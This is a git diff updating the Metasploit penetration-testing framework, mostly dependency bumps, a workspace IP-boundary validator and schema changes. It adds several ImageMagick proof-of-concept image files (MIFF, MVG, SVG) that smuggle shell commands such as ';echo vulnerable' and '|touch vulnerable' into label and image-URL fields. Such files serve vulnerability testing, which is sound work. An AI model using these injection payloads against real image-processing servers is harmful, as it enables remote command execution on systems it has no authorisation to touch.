Bring #6793 up to date with upstream-master
commit
e8304e684c
|
@ -1 +1 @@
|
|||
2.1.9
|
||||
2.3.1
|
||||
|
|
|
@ -10,7 +10,7 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.1.8'
|
||||
- '2.3.1'
|
||||
|
||||
env:
|
||||
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
|
||||
|
|
8
Gemfile
8
Gemfile
|
@ -25,14 +25,14 @@ end
|
|||
|
||||
group :development, :test do
|
||||
# automatically include factories from spec/factories
|
||||
gem 'factory_girl_rails', '~> 4.5.0'
|
||||
gem 'factory_girl_rails'
|
||||
# Make rspec output shorter and more useful
|
||||
gem 'fivemat', '~> 1.3.1'
|
||||
gem 'fivemat'
|
||||
# running documentation generation tasks and rspec tasks
|
||||
gem 'rake', '>= 10.0.0'
|
||||
gem 'rake'
|
||||
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
|
||||
# environment is development
|
||||
gem 'rspec-rails' , '~> 3.3'
|
||||
gem 'rspec-rails'
|
||||
end
|
||||
|
||||
group :test do
|
||||
|
|
298
Gemfile.lock
298
Gemfile.lock
|
@ -1,243 +1,249 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.11.22)
|
||||
actionpack (>= 4.0.9, < 4.1.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
metasploit-framework (4.12.7)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
bcrypt
|
||||
filesize
|
||||
jsobfu (~> 0.4.1)
|
||||
jsobfu
|
||||
json
|
||||
metasm (~> 1.0.2)
|
||||
metasm
|
||||
metasploit-concern
|
||||
metasploit-credential (= 1.1.0)
|
||||
metasploit-model (= 1.1.0)
|
||||
metasploit-payloads (= 1.1.6)
|
||||
metasploit_data_models (= 1.3.0)
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.1.11)
|
||||
metasploit_data_models
|
||||
msgpack
|
||||
network_interface (~> 0.0.1)
|
||||
network_interface
|
||||
nokogiri
|
||||
octokit
|
||||
openssl-ccm (= 1.2.1)
|
||||
packetfu (= 1.1.11)
|
||||
patch_finder (>= 1.0.2)
|
||||
openssl-ccm
|
||||
packetfu
|
||||
patch_finder
|
||||
pcaprub
|
||||
pg (>= 0.11)
|
||||
pg
|
||||
railties
|
||||
rb-readline-r7
|
||||
recog (= 2.0.14)
|
||||
recog
|
||||
redcarpet
|
||||
robots
|
||||
rubyzip (~> 1.1)
|
||||
rubyzip
|
||||
sqlite3
|
||||
tzinfo
|
||||
tzinfo-data
|
||||
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
actionmailer (4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
mail (~> 2.5, >= 2.5.4)
|
||||
actionpack (4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
builder (~> 3.1.0)
|
||||
erubis (~> 2.7.0)
|
||||
rack (~> 1.5.2)
|
||||
actionpack (4.2.6)
|
||||
actionview (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
activemodel (4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
builder (~> 3.1.0)
|
||||
activerecord (4.0.13)
|
||||
activemodel (= 4.0.13)
|
||||
activerecord-deprecated_finders (~> 1.0.2)
|
||||
activesupport (= 4.0.13)
|
||||
arel (~> 4.0.0)
|
||||
activerecord-deprecated_finders (1.0.4)
|
||||
activesupport (4.0.13)
|
||||
i18n (~> 0.6, >= 0.6.9)
|
||||
minitest (~> 4.2)
|
||||
multi_json (~> 1.3)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo (~> 0.3.37)
|
||||
addressable (2.3.8)
|
||||
arel (4.0.2)
|
||||
arel-helpers (2.2.0)
|
||||
activerecord (>= 3.1.0, < 5)
|
||||
aruba (0.6.2)
|
||||
childprocess (>= 0.3.6)
|
||||
cucumber (>= 1.1.1)
|
||||
rspec-expectations (>= 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
activemodel (4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.6)
|
||||
activemodel (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.6)
|
||||
i18n (~> 0.7)
|
||||
json (~> 1.7, >= 1.7.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
tzinfo (~> 1.1)
|
||||
addressable (2.4.0)
|
||||
arel (6.0.3)
|
||||
arel-helpers (2.3.0)
|
||||
activerecord (>= 3.1.0, < 6)
|
||||
aruba (0.14.1)
|
||||
childprocess (~> 0.5.6)
|
||||
contracts (~> 0.9)
|
||||
cucumber (>= 1.3.19)
|
||||
ffi (~> 1.9.10)
|
||||
rspec-expectations (>= 2.99)
|
||||
thor (~> 0.19)
|
||||
bcrypt (3.1.11)
|
||||
builder (3.1.4)
|
||||
capybara (2.4.4)
|
||||
builder (3.2.2)
|
||||
capybara (2.7.1)
|
||||
addressable
|
||||
mime-types (>= 1.16)
|
||||
nokogiri (>= 1.3.3)
|
||||
rack (>= 1.0.0)
|
||||
rack-test (>= 0.5.4)
|
||||
xpath (~> 2.0)
|
||||
childprocess (0.5.5)
|
||||
childprocess (0.5.9)
|
||||
ffi (~> 1.0, >= 1.0.11)
|
||||
coderay (1.1.0)
|
||||
cucumber (1.3.19)
|
||||
coderay (1.1.1)
|
||||
contracts (0.14.0)
|
||||
cucumber (2.3.3)
|
||||
builder (>= 2.1.2)
|
||||
cucumber-core (~> 1.4.0)
|
||||
cucumber-wire (~> 0.0.1)
|
||||
diff-lcs (>= 1.1.3)
|
||||
gherkin (~> 2.12)
|
||||
gherkin (~> 3.2.0)
|
||||
multi_json (>= 1.7.5, < 2.0)
|
||||
multi_test (>= 0.1.2)
|
||||
cucumber-rails (1.4.2)
|
||||
cucumber-core (1.4.0)
|
||||
gherkin (~> 3.2.0)
|
||||
cucumber-rails (1.4.3)
|
||||
capybara (>= 1.1.2, < 3)
|
||||
cucumber (>= 1.3.8, < 2)
|
||||
mime-types (>= 1.16, < 3)
|
||||
cucumber (>= 1.3.8, < 3)
|
||||
mime-types (>= 1.16, < 4)
|
||||
nokogiri (~> 1.5)
|
||||
rails (>= 3, < 5)
|
||||
railties (>= 3, < 5)
|
||||
cucumber-wire (0.0.1)
|
||||
diff-lcs (1.2.5)
|
||||
docile (1.1.5)
|
||||
erubis (2.7.0)
|
||||
factory_girl (4.5.0)
|
||||
factory_girl (4.7.0)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_girl_rails (4.5.0)
|
||||
factory_girl (~> 4.5.0)
|
||||
factory_girl_rails (4.7.0)
|
||||
factory_girl (~> 4.7.0)
|
||||
railties (>= 3.0.0)
|
||||
faraday (0.9.2)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
ffi (1.9.8)
|
||||
ffi (1.9.10)
|
||||
filesize (0.1.1)
|
||||
fivemat (1.3.2)
|
||||
gherkin (2.12.2)
|
||||
multi_json (~> 1.3)
|
||||
hike (1.2.3)
|
||||
gherkin (3.2.0)
|
||||
i18n (0.7.0)
|
||||
jsobfu (0.4.1)
|
||||
rkelly-remix (= 0.0.6)
|
||||
json (1.8.3)
|
||||
mail (2.6.3)
|
||||
mime-types (>= 1.16, < 3)
|
||||
loofah (2.0.3)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.2)
|
||||
metasploit-concern (1.1.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-credential (1.1.0)
|
||||
metasploit-concern (~> 1.1)
|
||||
metasploit-model (~> 1.1)
|
||||
metasploit_data_models (~> 1.3)
|
||||
metasploit-concern (2.0.1)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (2.0.2)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models
|
||||
pg
|
||||
railties
|
||||
rubyntlm
|
||||
rubyzip (~> 1.1)
|
||||
metasploit-model (1.1.0)
|
||||
activemodel (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-payloads (1.1.6)
|
||||
metasploit_data_models (1.3.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
rubyzip
|
||||
metasploit-model (2.0.0)
|
||||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.1.11)
|
||||
metasploit_data_models (2.0.0)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
metasploit-concern (~> 1.1)
|
||||
metasploit-model (~> 1.1)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
pg
|
||||
postgres_ext
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
method_source (0.8.2)
|
||||
mime-types (2.6.1)
|
||||
mime-types (3.0)
|
||||
mime-types-data (~> 3.2015)
|
||||
mime-types-data (3.2016.0221)
|
||||
mini_portile2 (2.0.0)
|
||||
minitest (4.7.5)
|
||||
msgpack (0.7.4)
|
||||
multi_json (1.11.2)
|
||||
minitest (5.8.4)
|
||||
msgpack (0.7.6)
|
||||
multi_json (1.12.0)
|
||||
multi_test (0.1.2)
|
||||
multipart-post (2.0.0)
|
||||
network_interface (0.0.1)
|
||||
nokogiri (1.6.7.2)
|
||||
mini_portile2 (~> 2.0.0.rc2)
|
||||
octokit (4.2.0)
|
||||
sawyer (~> 0.6.0, >= 0.5.3)
|
||||
octokit (4.3.0)
|
||||
sawyer (~> 0.7.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
packetfu (1.1.11)
|
||||
network_interface (~> 0.0)
|
||||
pcaprub (~> 0.12)
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.12.1)
|
||||
pcaprub (0.12.4)
|
||||
pg (0.18.4)
|
||||
pg_array_parser (0.0.9)
|
||||
postgres_ext (3.0.0)
|
||||
activerecord (>= 4.0.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.10.1)
|
||||
pry (0.10.3)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.8.1)
|
||||
slop (~> 3.4)
|
||||
rack (1.5.5)
|
||||
rack (1.6.4)
|
||||
rack-test (0.6.3)
|
||||
rack (>= 1.0)
|
||||
rails (4.0.13)
|
||||
actionmailer (= 4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
activerecord (= 4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
bundler (>= 1.3.0, < 2.0)
|
||||
railties (= 4.0.13)
|
||||
sprockets-rails (~> 2.0)
|
||||
railties (4.0.13)
|
||||
actionpack (= 4.0.13)
|
||||
activesupport (= 4.0.13)
|
||||
rails-deprecated_sanitizer (1.0.3)
|
||||
activesupport (>= 4.2.0.alpha)
|
||||
rails-dom-testing (1.0.7)
|
||||
activesupport (>= 4.2.0.beta, < 5.0)
|
||||
nokogiri (~> 1.6.0)
|
||||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.3)
|
||||
loofah (~> 2.0)
|
||||
railties (4.2.6)
|
||||
actionpack (= 4.2.6)
|
||||
activesupport (= 4.2.6)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (10.4.2)
|
||||
rake (11.1.2)
|
||||
rb-readline-r7 (0.5.2.0)
|
||||
recog (2.0.14)
|
||||
recog (2.0.21)
|
||||
nokogiri
|
||||
redcarpet (3.3.4)
|
||||
rkelly-remix (0.0.6)
|
||||
robots (0.10.1)
|
||||
rspec-core (3.3.2)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-expectations (3.3.1)
|
||||
rspec-core (3.4.4)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-expectations (3.4.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-mocks (3.3.2)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-mocks (3.4.1)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-rails (3.3.3)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-rails (3.4.2)
|
||||
actionpack (>= 3.0, < 4.3)
|
||||
activesupport (>= 3.0, < 4.3)
|
||||
railties (>= 3.0, < 4.3)
|
||||
rspec-core (~> 3.3.0)
|
||||
rspec-expectations (~> 3.3.0)
|
||||
rspec-mocks (~> 3.3.0)
|
||||
rspec-support (~> 3.3.0)
|
||||
rspec-support (3.3.0)
|
||||
rspec-core (~> 3.4.0)
|
||||
rspec-expectations (~> 3.4.0)
|
||||
rspec-mocks (~> 3.4.0)
|
||||
rspec-support (~> 3.4.0)
|
||||
rspec-support (3.4.1)
|
||||
rubyntlm (0.6.0)
|
||||
rubyzip (1.2.0)
|
||||
sawyer (0.6.0)
|
||||
addressable (~> 2.3.5)
|
||||
sawyer (0.7.0)
|
||||
addressable (>= 2.3.5, < 2.5)
|
||||
faraday (~> 0.8, < 0.10)
|
||||
shoulda-matchers (2.8.0)
|
||||
activesupport (>= 3.0.0)
|
||||
simplecov (0.9.2)
|
||||
shoulda-matchers (3.1.1)
|
||||
activesupport (>= 4.0.0)
|
||||
simplecov (0.11.2)
|
||||
docile (~> 1.1.0)
|
||||
multi_json (~> 1.0)
|
||||
simplecov-html (~> 0.9.0)
|
||||
simplecov-html (0.9.0)
|
||||
json (~> 1.8)
|
||||
simplecov-html (~> 0.10.0)
|
||||
simplecov-html (0.10.0)
|
||||
slop (3.6.0)
|
||||
sprockets (2.12.3)
|
||||
hike (~> 1.2)
|
||||
multi_json (~> 1.0)
|
||||
rack (~> 1.0)
|
||||
tilt (~> 1.1, != 1.3.0)
|
||||
sprockets-rails (2.2.4)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
sprockets (>= 2.8, < 4.0)
|
||||
sqlite3 (1.3.11)
|
||||
thor (0.19.1)
|
||||
thread_safe (0.3.5)
|
||||
tilt (1.4.1)
|
||||
timecop (0.7.3)
|
||||
tzinfo (0.3.45)
|
||||
timecop (0.8.1)
|
||||
tzinfo (1.2.2)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2016.4)
|
||||
tzinfo (>= 1.0.0)
|
||||
xpath (2.0.0)
|
||||
nokogiri (~> 1.3)
|
||||
yard (0.8.7.6)
|
||||
|
@ -248,18 +254,18 @@ PLATFORMS
|
|||
DEPENDENCIES
|
||||
aruba
|
||||
cucumber-rails
|
||||
factory_girl_rails (~> 4.5.0)
|
||||
fivemat (~> 1.3.1)
|
||||
factory_girl_rails
|
||||
fivemat
|
||||
metasploit-framework!
|
||||
octokit (~> 4.0)
|
||||
pry
|
||||
rake (>= 10.0.0)
|
||||
rake
|
||||
redcarpet
|
||||
rspec-rails (~> 3.3)
|
||||
rspec-rails
|
||||
shoulda-matchers
|
||||
simplecov
|
||||
timecop
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.11.2
|
||||
1.12.5
|
||||
|
|
|
@ -0,0 +1,82 @@
|
|||
module Mdm::Workspace::BoundaryRange
|
||||
extend ActiveSupport::Concern
|
||||
|
||||
included do
|
||||
#
|
||||
# Validations
|
||||
#
|
||||
|
||||
validate :boundary_must_be_ip_range
|
||||
|
||||
#
|
||||
# Instance Methods
|
||||
#
|
||||
|
||||
# If {#limit_to_network} is disabled, this will always return `true`.
|
||||
# Otherwise, return `true` only if all of the given IPs are within the
|
||||
# project {#boundary boundaries}.
|
||||
|
||||
#
|
||||
# @param ips [String] IP range(s)
|
||||
# @return [true] if actions on ips are allowed.
|
||||
# @return [false] if actions are not allowed on ips.
|
||||
def allow_actions_on?(ips)
|
||||
return true unless limit_to_network
|
||||
return true unless boundary
|
||||
return true if boundary.empty?
|
||||
boundaries = Shellwords.split(boundary)
|
||||
return true if boundaries.empty? # It's okay if there is no boundary range after all
|
||||
given_range = Rex::Socket::RangeWalker.new(ips)
|
||||
return false unless given_range # Can't do things to nonexistant IPs
|
||||
allowed = false
|
||||
boundaries.each do |boundary_range|
|
||||
ok_range = Rex::Socket::RangeWalker.new(boundary)
|
||||
allowed = true if ok_range.include_range? given_range
|
||||
end
|
||||
return allowed
|
||||
end
|
||||
|
||||
# Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or
|
||||
# IP address range}. Due to this not being tested before it was moved here
|
||||
# from Mdm, the default workspace does not validate. We always validate boundaries
|
||||
# and a workspace may have a blank default boundary.
|
||||
#
|
||||
# @return [void]
|
||||
def boundary_must_be_ip_range
|
||||
unless boundary.blank?
|
||||
begin
|
||||
boundaries = Shellwords.split(boundary)
|
||||
rescue ArgumentError
|
||||
boundaries = []
|
||||
end
|
||||
|
||||
boundaries.each do |range|
|
||||
unless valid_ip_or_range?(range)
|
||||
errors.add(:boundary, "must be a valid IP range")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Returns an array of addresses ranges
|
||||
#
|
||||
# @return [Array<String>]
|
||||
def addresses
|
||||
(boundary || "").split("\n")
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
# Returns whether `string` is a valid IP address or IP address range.
|
||||
#
|
||||
# @return [true] if valid IP address or IP address range.
|
||||
# @return [false] otherwise.
|
||||
def valid_ip_or_range?(string)
|
||||
range = Rex::Socket::RangeWalker.new(string)
|
||||
range && range.ranges && range.ranges.any?
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
|
@ -0,0 +1,5 @@
|
|||
if defined? Metasploit::Framework::Application
|
||||
Metasploit::Framework::Application.configure do
|
||||
config.log_level = :info
|
||||
end
|
||||
end
|
|
@ -28,7 +28,7 @@ File.readlines(sitelist).each do |site|
|
|||
next if site =~ /^#/
|
||||
|
||||
out = File.join(output, site + ".txt")
|
||||
File.unlink(out) if File.exists?(out)
|
||||
File.unlink(out) if File.exist?(out)
|
||||
|
||||
fd = File.open(out, "a")
|
||||
|
||||
|
|
|
@ -0,0 +1,14 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";echo vulnerable"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -0,0 +1,8 @@
|
|||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 'https://localhost";echo vulnerable"'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
|
@ -0,0 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="https://localhost";echo vulnerable"" />
|
||||
</svg>
|
After Width: | Height: | Size: 593 B |
|
@ -0,0 +1,14 @@
|
|||
id=ImageMagick version=1.0
|
||||
class=DirectClass colors=0 matte=False
|
||||
columns=1 rows=1 depth=16
|
||||
colorspace=sRGB
|
||||
page=1x1+0+0
|
||||
rendering-intent=Perceptual
|
||||
gamma=0.454545
|
||||
red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
|
||||
white-point=0.3127,0.329
|
||||
date:create=2016-05-04T00:19:42-05:00
|
||||
date:modify=2016-05-04T00:19:42-05:00
|
||||
label={";touch vulnerable"}
|
||||
|
||||
:ÿÿÿÿÿÿ
|
|
@ -0,0 +1,8 @@
|
|||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 '|touch vulnerable'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
|
@ -0,0 +1,5 @@
|
|||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
|
||||
xlink:href="|touch vulnerable" />
|
||||
</svg>
|
After Width: | Height: | Size: 480 B |
|
@ -23,13 +23,27 @@
|
|||
document.getElementById('overview_info').style.display = "none";
|
||||
document.getElementById('knowledge_base').style.display = "inline";
|
||||
}
|
||||
|
||||
function initDoc() {
|
||||
var kb = document.getElementById('knowledge_base');
|
||||
var oi = document.getElementById('overview_info');
|
||||
oi.style.display = "none";
|
||||
kb.style.display = "inline";
|
||||
|
||||
var kb_button = document.getElementById('knowledge_base_button');
|
||||
var oi_button = document.getElementById('overview_info_button');
|
||||
kb_button.style.borderColor = "#ccc";
|
||||
kb_button.style.color = "#333";
|
||||
oi_button.style.borderColor = "#EEEEEE";
|
||||
oi_button.style.color = "#C4C4C4";
|
||||
}
|
||||
</script>
|
||||
<% end %>
|
||||
<style>
|
||||
<%= load_css %>
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<body onload="initDoc()">
|
||||
<% unless kb.empty? %>
|
||||
<table border="0">
|
||||
<tr>
|
||||
|
|
|
@ -89,7 +89,6 @@ code {
|
|||
}
|
||||
pre {
|
||||
display: block;
|
||||
padding: 16px;
|
||||
margin: 0 0 18px;
|
||||
line-height: 16px;
|
||||
font-size: 13px;
|
||||
|
@ -115,8 +114,8 @@ pre code {
|
|||
padding:10px 5px;
|
||||
border-style:solid;
|
||||
border-width:1px;
|
||||
border-color:#ccc;
|
||||
color:#333;
|
||||
border-color:#EEEEEE;
|
||||
color:#C4C4C4;
|
||||
}
|
||||
#knowledge_base_button {
|
||||
font-family:Arial, sans-serif;
|
||||
|
@ -124,22 +123,18 @@ pre code {
|
|||
padding:10px 5px;
|
||||
border-style:solid;
|
||||
border-width:1px;
|
||||
border-color:#EEEEEE;
|
||||
color:#C4C4C4;
|
||||
border-color:#ccc;
|
||||
color:#333;
|
||||
}
|
||||
#overview_info_button:hover, #knowledge_base_button:hover {
|
||||
cursor: pointer;
|
||||
}
|
||||
#knowledge_base {
|
||||
display: none;
|
||||
}
|
||||
#long_list {
|
||||
height:280px;
|
||||
overflow:auto;
|
||||
border-style: solid;
|
||||
border-width: 1px;
|
||||
border-color: #ccc;
|
||||
padding: 5px;
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -660,6 +660,7 @@ fresno
|
|||
front
|
||||
frontdesk
|
||||
fs
|
||||
fs1
|
||||
fsp
|
||||
ftp
|
||||
ftp-
|
||||
|
@ -1495,6 +1496,7 @@ shoppers
|
|||
shopping
|
||||
si
|
||||
siebel
|
||||
siem
|
||||
sierra
|
||||
sigma
|
||||
signin
|
||||
|
|
138
db/schema.rb
138
db/schema.rb
|
@ -11,18 +11,18 @@
|
|||
#
|
||||
# It's strongly recommended that you check this file into your version control system.
|
||||
|
||||
ActiveRecord::Schema.define(version: 20150514182921) do
|
||||
ActiveRecord::Schema.define(version: 20160415153312) do
|
||||
|
||||
# These are extensions that must be enabled in order to support this database
|
||||
enable_extension "plpgsql"
|
||||
|
||||
create_table "api_keys", force: true do |t|
|
||||
create_table "api_keys", force: :cascade do |t|
|
||||
t.text "token"
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "automatic_exploitation_match_results", force: true do |t|
|
||||
create_table "automatic_exploitation_match_results", force: :cascade do |t|
|
||||
t.integer "match_id"
|
||||
t.integer "run_id"
|
||||
t.string "state", null: false
|
||||
|
@ -33,7 +33,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_match_results", ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id", using: :btree
|
||||
add_index "automatic_exploitation_match_results", ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_match_sets", force: true do |t|
|
||||
create_table "automatic_exploitation_match_sets", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "user_id"
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -43,7 +43,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_match_sets", ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id", using: :btree
|
||||
add_index "automatic_exploitation_match_sets", ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_matches", force: true do |t|
|
||||
create_table "automatic_exploitation_matches", force: :cascade do |t|
|
||||
t.integer "module_detail_id"
|
||||
t.string "state"
|
||||
t.integer "nexpose_data_vulnerability_definition_id"
|
||||
|
@ -58,7 +58,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_matches", ["module_detail_id"], name: "index_automatic_exploitation_matches_on_module_detail_id", using: :btree
|
||||
add_index "automatic_exploitation_matches", ["module_fullname"], name: "index_automatic_exploitation_matches_on_module_fullname", using: :btree
|
||||
|
||||
create_table "automatic_exploitation_runs", force: true do |t|
|
||||
create_table "automatic_exploitation_runs", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "user_id"
|
||||
t.integer "match_set_id"
|
||||
|
@ -70,7 +70,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "automatic_exploitation_runs", ["user_id"], name: "index_automatic_exploitation_runs_on_user_id", using: :btree
|
||||
add_index "automatic_exploitation_runs", ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id", using: :btree
|
||||
|
||||
create_table "clients", force: true do |t|
|
||||
create_table "clients", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
t.string "ua_string", limit: 1024, null: false
|
||||
|
@ -79,17 +79,17 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "credential_cores_tasks", id: false, force: true do |t|
|
||||
create_table "credential_cores_tasks", id: false, force: :cascade do |t|
|
||||
t.integer "core_id"
|
||||
t.integer "task_id"
|
||||
end
|
||||
|
||||
create_table "credential_logins_tasks", id: false, force: true do |t|
|
||||
create_table "credential_logins_tasks", id: false, force: :cascade do |t|
|
||||
t.integer "login_id"
|
||||
t.integer "task_id"
|
||||
end
|
||||
|
||||
create_table "creds", force: true do |t|
|
||||
create_table "creds", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -102,7 +102,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "source_type"
|
||||
end
|
||||
|
||||
create_table "events", force: true do |t|
|
||||
create_table "events", force: :cascade do |t|
|
||||
t.integer "workspace_id"
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
|
@ -114,7 +114,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "info"
|
||||
end
|
||||
|
||||
create_table "exploit_attempts", force: true do |t|
|
||||
create_table "exploit_attempts", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
t.integer "vuln_id"
|
||||
|
@ -130,7 +130,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "fail_detail"
|
||||
end
|
||||
|
||||
create_table "exploited_hosts", force: true do |t|
|
||||
create_table "exploited_hosts", force: :cascade do |t|
|
||||
t.integer "host_id", null: false
|
||||
t.integer "service_id"
|
||||
t.string "session_uuid", limit: 8
|
||||
|
@ -140,7 +140,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
